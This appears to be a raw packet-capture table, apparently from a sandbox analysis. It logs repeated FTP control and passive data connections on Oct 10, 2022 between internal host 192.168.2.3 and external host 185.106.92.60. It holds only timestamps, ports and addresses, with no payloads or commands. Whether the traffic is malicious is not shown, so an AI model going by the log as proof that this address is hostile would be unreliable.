                                                                                                                                    Oct 10, 2022 06:02:22.085787058 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.109639883 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.111130953 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.111367941 CEST4973064521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.133899927 CEST6452149730185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.134022951 CEST4973064521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.134377003 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.158143044 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.158385992 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.159060001 CEST4973064521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.181531906 CEST6452149730185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.181807995 CEST6452149730185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.182677031 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.182775974 CEST4973064521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.182816982 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.183485985 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.206238031 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.206300020 CEST2149729185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.206406116 CEST4972921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.331536055 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.357894897 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.358129025 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.390857935 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.390938044 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.390969038 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.391204119 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.391567945 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.419006109 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.423320055 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.426326036 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.450233936 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.451251030 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.451421022 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.478276014 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.478564024 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.478773117 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.503679037 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.503959894 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.515029907 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.541374922 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.541515112 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.542632103 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.568861008 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.569088936 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.569391012 CEST4973264522192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.592542887 CEST6452249732185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.592758894 CEST4973264522192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.593022108 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.619286060 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.619514942 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.629280090 CEST4973264522192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.652395964 CEST6452249732185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.652448893 CEST6452249732185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.652636051 CEST4973264522192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.653932095 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.654145002 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.654453993 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.677989960 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.678180933 CEST2149731185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.678335905 CEST4973121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.785600901 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.808907032 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.809051037 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.835539103 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.835582018 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.835716009 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.836086988 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.836158991 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.836231947 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.859236956 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.859415054 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.859505892 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.882893085 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.883127928 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.883388042 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.906385899 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.907078028 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.907308102 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.930854082 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.931129932 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.932164907 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.955303907 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.955512047 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.971191883 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.994652033 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:22.994937897 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:22.995191097 CEST4973464523192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.020174980 CEST6452349734185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.020417929 CEST4973464523192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.020668030 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.045003891 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.045249939 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.045952082 CEST4973464523192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.069536924 CEST6452349734185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.069648981 CEST6452349734185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.069786072 CEST4973464523192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.070126057 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.070276976 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.131764889 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.154921055 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.154970884 CEST2149733185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.155047894 CEST4973321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.288387060 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.311604023 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.311724901 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.338378906 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.338485003 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.339214087 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.339265108 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.339272976 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.339318991 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.339471102 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.362502098 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.362622976 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.362787962 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.385737896 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.385868073 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.386008024 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.409091949 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.409209967 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.409378052 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.432935953 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.433099985 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.433495045 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.456430912 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.456513882 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.457434893 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.480895996 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.480984926 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.481184959 CEST4973664524192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.505012989 CEST6452449736185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.505153894 CEST4973664524192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.505410910 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.530968904 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.531112909 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.533910036 CEST4973664524192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.558350086 CEST6452449736185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.558419943 CEST6452449736185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.558489084 CEST4973664524192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.558945894 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.559062958 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.559191942 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.582005978 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.582053900 CEST2149735185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.582115889 CEST4973521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.716684103 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.739479065 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.739609003 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.765510082 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.765556097 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.765587091 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.765604973 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.765641928 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.765651941 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.765923023 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.788806915 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.788932085 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.789068937 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.811860085 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.811964035 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.812150955 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.834942102 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.835091114 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.835231066 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.858526945 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.858608007 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.859030962 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.881634951 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.881715059 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.882631063 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.905857086 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.906012058 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.906450033 CEST4973864526192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.929218054 CEST6452649738185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.929394007 CEST4973864526192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.930340052 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.953625917 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.953828096 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.965958118 CEST4973864526192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.988609076 CEST6452649738185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.988679886 CEST6452649738185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.988795042 CEST4973864526192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.989465952 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:23.989563942 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:23.989707947 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.012188911 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.012240887 CEST2149737185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.012303114 CEST4973721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.158083916 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.183100939 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.183244944 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.210303068 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.210355043 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.210500956 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.210639000 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.210639000 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.210771084 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.234966993 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.235107899 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.235235929 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.259916067 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.260046005 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.263212919 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.287812948 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.287919044 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.288301945 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.312901974 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.313000917 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.313385010 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.337122917 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.337258101 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.339052916 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.363744020 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.363931894 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.364475965 CEST4974064527192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.389158964 CEST6452749740185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.389377117 CEST4974064527192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.389573097 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.415540934 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.415735006 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.416410923 CEST4974064527192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.440924883 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.441277981 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.441512108 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.441831112 CEST6452749740185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.441986084 CEST6452749740185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.442101955 CEST4974064527192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.467160940 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.467197895 CEST2149739185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.467413902 CEST4973921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.593588114 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.618747950 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.618931055 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.648461103 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.648507118 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.648539066 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.648569107 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.648617029 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.648617029 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.648897886 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.676702976 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.677011013 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.677252054 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.703299999 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.707241058 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.707653046 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.735112906 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.735296965 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.735526085 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.762495995 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.762732029 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.763637066 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.791687012 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.793663979 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.795716047 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.824875116 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.825426102 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.827121973 CEST4974264528192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.850812912 CEST6452849742185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.850990057 CEST4974264528192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.851269960 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.877536058 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.877753019 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.878350973 CEST4974264528192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.900800943 CEST6452849742185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.900990963 CEST6452849742185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.901195049 CEST4974264528192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.903760910 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.907135010 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.907387972 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:24.932684898 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.932724953 CEST2149741185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:24.932893991 CEST4974121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.074706078 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.098012924 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.098297119 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.124284029 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.124334097 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.124422073 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.124608994 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.124608994 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.124893904 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.148047924 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.149581909 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.150553942 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.173783064 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.174052000 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.174191952 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.197455883 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.197706938 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.197865009 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.221245050 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.221570015 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.222297907 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.245145082 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.245289087 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.248389959 CEST4974321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:25.272140026 CEST2149743185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:25.275557995 CEST4974321192.168.2.3185.106.92.60
